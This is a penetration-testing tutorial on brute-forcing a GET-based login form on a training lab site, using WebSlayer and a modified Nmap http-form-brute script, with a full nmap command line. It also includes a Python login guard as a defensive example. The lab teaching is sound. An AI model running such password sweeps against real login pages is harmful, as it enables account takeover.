This is the attack pre-setup; now, before we generate our payloads, we need to set the keyword FUZZ to the headers, parameters or any field where we'd like WebSlayer to brute our generated lists of usernames or passwords. In WebSlayer, one needs to know the usernames to brute the passwords (which is the limitation) but in this case, to demonstrate how an attacker tool-set is used, we already know the username, which is admin@pentesteracademy.com, and we need to generate a password list of minimum 5 and maximum 5 with the help of WebSlayer.
Here, we know the parameters which we'd be trying to brute is a GET request with parameters email and password. We also know the email parameter would take admin@pentesteracademy.com and password is the parameter we'd need to fuzz; so we'd quickly change the URL in WebSlayer to suit our needs (notice the URL: when we put junk values into the login form using the original browser, the browser generates a GET based URL which reveals the whole URL):
So, we feed this URL to WebSlayer's URL and make some changes; we'll see what the changes are which are required. For now, we just need to copy this GET based request to WebSlayer.
Now that the original GET based request had been fed to WebSlayer's URL tab, we need to make the changes to these parameters:
a.) email
b.) password
We know the username to be admin@pentesteracademy.com, and we need to FUZZ the password parameter, so the value for the email parameter would be admin@pentesteracademy.com and the value for the password parameter would be FUZZ since we need to brute this parameter in order to determine the credentials; so the URL becomes (note that FUZZ is a keyword, anything you put in the term as FUZZ will be taken as a target input feed for WebSlayer):
Notice the changes made to the URL for WebSlayer to be configured so that it could take admin@pentesteracademy.com as the username and the payloads we generate on the password parameter. The value of the email parameter remains intact.
After this initial set-up, we'd need to generate a password list; select the Payload Type as Dictionary as shown here:
In this attack, we are using the Dictionary passwords file previously created because, after a thorough investigation, I found that we cannot use the payload option since the payload fails at generating the minimum and maximum characters using combination; it only supports permutation with a fixed width type along with the given characters which are x, y and z. So, once the Dictionary attack type is selected, we could generate the list via crunch; here we'll use the previously generated list. Load up the list by clicking on the … option and select the list file. The list file here is named as passwords.txt:
After opening up the list which is passwords.txt, click Start:
Once Start is hit, we are taken to the Attack Results tab:
Below we can Stop or Pause the current attack and see the payload processing:
Once everything finishes, a green string would show up the successful break down of the password with the given email parameter value as admin@pentesteracademy.com and the password value set to FUZZ to go through the payload processing:
Here we see that the Payload zzz was the string with its MD5 worked; from here, we can hit on Response HTML to verify if the password with the supplied username login was cracked:
Use the same Payload extracted at this point to login via the original browser, and the same results would be achieved. However, there are plenty more options in WebSlayer in the Payload Generator tab, where apart from doing combination and permutation generation, a variety of possible payload generation could be done which includes Block payload generation, credit card payload generation, username generation which could be taken for the enumeration part, and numerical payload generation:
improvements to the Nmap Project. Nmap is available both for Linux as well as for Windows. It also works with Mac but with various lags in speed. Benchmarks prove Nmap is slower on Mac than on Linux based operating systems. There is whole documentation available on Nmap and how to use it which could be found here. Here's a book by Fyodor himself on Nmap. In case anyone needs a very thorough understanding of Nmap, follow the book. If you need this only for a penetration testing task or as a tool-set for a quick dirty pentest based out of a network, mail me at [email protected] and there's an ongoing research document which I had been preparing.
Nmap can scan for open ports. It can detect the host operating system remotely. It also can detect application versions, and has signatures preset for recognizing application, OS and other daemon versions. It does host discovery, operating system enumeration, and report generation using XML standards and firewall evasion on the go. It has both CLI and GUI versions. The GUI version of Nmap is known as Zenmap. When it's scanning and network enumeration, fingerprinting, Nmap is the first favorite choice of any dedicated red team using this tool as an army Swiss knife (same goes for Netcat!).
Nmap has an engine called Nmap Scripting Engine (NSE). The engine is documented here and is written in the Lua language. Apart from Nmap itself, NSE provides the flexibility to separate additional tasks like automating an exploit, actually exploiting a target, and provides a range of capabilities such as enumeration, vulnerability detection and much more. Read the documentation. Also, in Kali Linux, which has been an operating system based out of Debian, the Nmap scripts reside in the /usr/share/nmap/scripts directory:
Before we go into opting the NSE engine to bruteforce web based form logins, there are certain things which you'd need to know:
1. The NSE is completely community based and written in Lua.
2. As of 2014, August, there were no such scripts written in Nmap which assisted bruteforcing web based logins using the GET method.
3. I had to manually change code for Lua in the NSE file and implement into a currently working script for Nmap which was http-form-brute.nse. Credits to nnposter on Nmap development.
4. By default, as of 2014, August, this particular script only uses the POST method and there is no support for GET based web form bruteforce, and hence the code needs to be modified in order to support both methods.
5. This code which will be documented here isn't a part of penetration testing and is wholly devoted to scripting the NSE and then using this newly developed/modified Lua code script to identify GET based form authentication and assist bruteforcing them.
6. The script will be covered here and this might be on a patch release later, and hence the original script would require a backup before we use our own script in Lua making modifications to the original code.
7. NSE uses script arguments so there are different script arguments for different scripts. The code which would be presented here adds yet another argument to the list apart from what was originally offered. It's because the script provided support for the POST method and not GET, so modifying the script to our own needs, I had to go ahead and add an additional argument set called http-form-brute.method which takes input as a GET or a POST to make sure that the request method is declared before we start bruteforcing the target application.
8. The modified script itself is not stable as for now. It gives false positives which is currently being worked against. But with several tests, it showed 70% positives with the tested methods above which proves that it could crack credentials. If the credentials generated by this script go wrong, trial and error is used against the application to get the right credentials. Nmap developers are fixing this.
9. Update the Nmap script database at a later time (with this revision after 2014) to make the best usage. This is the first ever documented script and a functional one for the attempt we are going to make. Don't focus on the script and move directly to the pentest part if you do not understand Lua or can't code more.
Backing up the original script is easy: you would need to copy the existing original script and store it in the same directory for later use:
Now one would need to update the original script with the following code provided here. A raw version could be found here. Since we had backed up our original script code for http-form-brute.nse, we can go ahead and replace the original script code with the script code which has been provided here, because this new script provides new functionality including the choice of POST or GET as the HTTP request.
Copy the code from the raw version of the ASCII text code in Lua provided here and paste it into the editor of choice. Make sure the name stays the same, that is http-form-brute.nse. After pasting this new code, CTRL+O to save the code in nano and hit carriage-return, i.e. Enter, and then CTRL+X to exit the editor. The following screenshot shows the demonstration of the code which has been developed using nano as the text editor of choice. For new users, leafpad which comes along with Kali would be great, or gedit which could be installed via apt-get install gedit on the command line.
It's recommended for experienced Lua coders to go through the code and modify it if any changes are needed. This belongs in accordance with the needs of the pentester. Also mail me if there is something you modify, since I'd be interested to keep track of the changes in the code.
Now that we have everything set up with the replaced code, we need to trigger Nmap from the command line and set up a crafted Nmap NSE script with arguments. The script argument is something which most find tricky. Keeping everything aside, when you realize the way Nmap script arguments are passed via the CLI, the true power lies there for quick exploitation as well as quick tests. NSE provides a variety of lists for checks, exploitation, enumeration and a vast database for automating tasks. This document again does not discuss Nmap in detail; I'd rather jump over to using NSE for bruteforcing web application forms which might be GET based HTTP requests. A GET request is something which is imprinted on the URL, which in this case is:
https://pentesteracademylab.appspot.com/lab/webapp/1?email=test&password=test
Both the username, which is the email parameter, and the password, which is the password parameter, are being passed in clear text on the URL, which means the request method is GET. This could also be verified using the view-source which was discussed earlier in this document.
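Because the credentials travel in the query string, every guess also ends up in the web server's access log, proxy logs and browser history. The login guard below is an added example (not the lab's code) of the server-side controls that blunt all three tools in this document: credentials are refused on GET, each (source, account) pair gets a small failure budget per window, and the response body is the same uniform "Failed!" whether the account exists or not. The user store, salt and admin password are constructed placeholders.

```python
import hashlib
import hmac
import time
from collections import defaultdict

# Constructed demo values (hypothetical, not the lab's): salt, cost and admin password.
_SALT = b"constructed-demo-salt"
_ROUNDS = 100_000


def _hash_password(password):
    # Slow, salted hash so an offline guess costs far more than a string compare.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), _SALT, _ROUNDS)


USERS = {"admin@pentesteracademy.com": _hash_password("placeholder-password")}


class LoginGuard:
    """Server-side login check with three controls the tools in this document run into:
    credentials are refused on GET, each (source, account) pair gets a failure budget
    per window, and the failure message is identical for a wrong password and an
    unknown account, so neither the body nor the status code tells the two apart."""

    def __init__(self, max_failures=5, window_seconds=60):
        self.max_failures = max_failures
        self.window = window_seconds
        self._failures = defaultdict(list)  # (ip, email) -> failure timestamps

    def _recent_failures(self, key, now):
        # Drop timestamps that fell out of the window, keep the rest.
        kept = [t for t in self._failures[key] if now - t < self.window]
        self._failures[key] = kept
        return len(kept)

    def login(self, method, ip, email, password, now=None):
        """Return (status, body). Only a POST with a correct password yields 200/Welcome."""
        now = time.monotonic() if now is None else now
        if method != "POST":
            # A GET puts the password in the URL: access logs, proxies and browser
            # history all keep it. Refuse before evaluating anything.
            return 405, "Failed!"
        key = (ip, email)
        if self._recent_failures(key, now) >= self.max_failures:
            # Budget spent: the guess is not checked at all, correct or not, so a
            # 243-candidate sweep like the one in this document stalls at max_failures.
            return 429, "Failed!"
        stored = USERS.get(email)
        candidate = _hash_password(password)  # hash even for unknown accounts: uniform timing
        if stored is not None and hmac.compare_digest(stored, candidate):
            self._failures.pop(key, None)
            return 200, "Welcome"
        self._failures[key].append(now)
        return 200, "Failed!"
```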
Knowing to trigger Nmap with the -sC switch and using --script with --script-args. There's a difference between running the -sC switch and targeting a specific application using a specific NSE script. The general -sC switch will do a default script run over, which would be equivalent to --script=default.
After the application has been mapped, to use the power of the NSE script to our advantage, we need a more specific script, which we had developed earlier in the Lua code, to be run by Nmap. In order to accomplish this, we need to trigger the script with the --script= directive and mention the script name. Nmap takes care of the rest and is automatically synced with the /usr/share/nmap/scripts directory, and hence would not require a .nse extension to be provided when naming the script. First, the main target is specified along with the port to be targeted; web-servers run on 80 by default and our target pentesteracademylab.appspot.com has the same port open which serves web-content, or which is running an HTTP server. Hence we have more script arguments which are newly introduced from the script; these are all the arguments one needs to pass to the script (http-form-brute.nse):
1. http-form-brute.hostname – Specifies the hostname.
2. http-form-brute.path – Specifies the path URI.
3. http-form-brute.method – Specifies the web form method.
4. http-form-brute.uservar – Specifies the name of the form field for the username.
5. http-form-brute.passvar – Specifies the name of the form field for the password.
6. userdb – The database of line feed usernames for bruteforce.
7. passdb – The database of line feed passwords for bruteforce.
Here these arguments are supposed to be mentioned in the crafted query for Nmap when --script=http-form-brute with --script-args is declared. All of the script args are under ' ' (single quotes).
Since we now understand the format to specify the Nmap arguments, I need to show some of the common mistakes one could run into when writing the query for Nmap. These are stated here so these mistakes could be dealt with in no time and when the audience writes the query for the first time, he/she feels confident enough. Some of the mentionable points while writing the script argument queries are the following:
1. The --script=script-name-here declares the script an attacker is using. Here it's http-form-brute and hence this would be --script=http-form-brute.
2. To specify specific arguments to the script which we require here, one needs to declare --script-args='argument.specifics="value", argument.specifics="value"', which then takes all the arguments under ' ' (single quotes), and within these single quotes are the argument names like http-form-brute.method, http-form-brute.path, http-form-brute.hostname and everything else. All the argument names are separated by , (comma).
3. The values of the desired argument names would be under double quotes as shown above in point [2]. Apart from this, the userdb and the passdb in this scenario take the input from a file and hence there are no double quotes, although double quotes could be provided.
4. Using the -n switch before starting the script analysis means the attacker doesn't want to do a dns scan and hence stands the same as --no-dns.
5. The -p switch mentions the port to be scanned. I wanted to scan port 80 which is a specific target port which serves the web application and is open. So a -p80 will be sufficient for the NSE script to go ahead and bruteforce that port and none else. I could specify other ports via -p 80 and more.
6. As usual with Nmap, before everything else, the attacker must specify the target host if not the whole URI. That is, in this case before writing everything, mention the target host pentesteracademylab.appspot.com for Nmap to start, then the port, then the no-dns mentionable, and then the script one needs to use which in this case is http-form-brute, and then the script arguments.
7. Last but not the least, the attacker also for convenience specifies the -vvv switch at the last, which stands for extra verbosity. A single v would have been less verbose, vv would be less verbose compared to vvv, and hence I specified the maximum level of verbosity which we can attain to go through the results while Nmap would be already bruteforcing.
Triggering Nmap with the crafted query for the modified http-form-brute. I have mentioned what needed attention to go ahead and craft the query. After everything has been made clear, I go ahead and craft the following query for our modified version of the Nmap NSE script:
nmap pentesteracademylab.appspot.com -n -p80 --script=http-form-brute --script-args='http-form-brute.path="/lab/webapp/1", http-form-brute.hostname="pentesteracademylab.appspot.com", http-form-brute.method="GET", passdb="/root/Desktop/pentesteracademy/challenge1/passwords.txt", userdb="/root/Desktop/pentesteracademy/challenge1/users.txt", http-form-brute.passvar=password, http-form-brute.uservar=email' -vvv
The crafted query is simple unless one looks at its length. Nmap takes the target host as pentesteracademylab.appspot.com and with a -n switch I specified that we need not re-do dns queries and hence no-dns follows; next I mention the target port which is 80 and then I mention the --script=http-form-brute which is the modified script under the /usr/share/nmap/scripts/ directory. I then mention the --script-args= providing the script the arguments which are required for the target, separated by a comma and enclosed in single quotes as discussed above. The values of these arguments are enclosed in double quotes. And I then specify a verbose result while Nmap would be running; this is optional and is not required. I however like to maintain the dignity of the results for a quicker look during a penetration test. Everything would look like the following:
The original query is attached above. If you need to understand what it's doing, I suggest reading this section again and again. It's better than copying the query and pasting it over the terminal for results. That would hamper everything which is being documented here. Apart from it, when Nmap finishes, the results would be like the following:
1. It will go ahead and target the specified port.
2. It will load the Nmap script specified.
3. It will attempt to recognize the specified URI which the script mentions.
4. The usernames will be taken from userdb.
5. The passwords will be taken from passdb.
6. The form variables will be taken from uservar for the username.
7. The form variables will be taken from passvar for the password.
8. It will adjust the endpoints and GET will be used to bruteforce these endpoints.
9. Optionally one could also store the results in xml format.
The bruteforce will be taking time since it's bruteforce:
Depending on the network, it would take time to bring the results back; the results are varied and hence may require trial and error. This happens due to packets being sent either too slowly or due to the time lags. False positives are common using the modified script.
As the audience sees the result, these are false positives which were caught in hook by the modified Lua script; with some trial and error, one should be able to get the right credentials. As this is getting documented here, Nmap developers are working on the current Lua script for better detection. With a fast connection, the false positives are however minimized. This happens due to the TCP packets being sent at a low rate and therefore the response from the web-server getting malformed. It's due to network bottlenecks.
That marks the conclusion of this document and I hope the audience gets the vision of how to carry out different attacks via the same attack vector but with different approaches. The point of this document is not to show how things are exploited and you get credentials; that could be done either way. But the point is to show how many ways a pentester could go ahead and break the web application to suit his/her objectives. This is a series of documents to follow.
Contact Information
LinkedIn: Contact me on LinkedIn here.
Facebook: Contact me on Facebook here.
Reach me at: [email protected]